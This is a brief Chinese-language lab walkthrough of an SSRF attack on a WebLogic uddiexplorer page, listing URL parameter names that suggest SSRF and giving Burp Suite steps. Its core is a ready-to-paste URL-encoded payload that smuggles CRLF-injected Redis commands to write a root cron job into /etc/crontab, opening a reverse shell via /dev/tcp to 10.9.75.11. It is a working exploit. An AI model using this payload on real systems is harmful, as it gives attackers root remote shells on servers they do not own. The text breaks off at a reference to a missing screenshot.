- SSRF漏洞
1 若ssrf漏洞发现url当中有这些源码,则有可能出现SSRF漏洞
share
wap
url
link
src
source
target
u
3g
display
sourceURL
imageURL
domain
2. 登录平台后台初始化
3. 进入该网址目录 http://10.9.75.11:7001/uddiexplorer
4.点击serch,使用bp进行抓包,并将其发送到bp。
5.将下面这段url复制替换bp中的数值。
http://172.23.0.2:6379/JHG%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.9.75.11%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa JHG
复制后如下图,发送数据包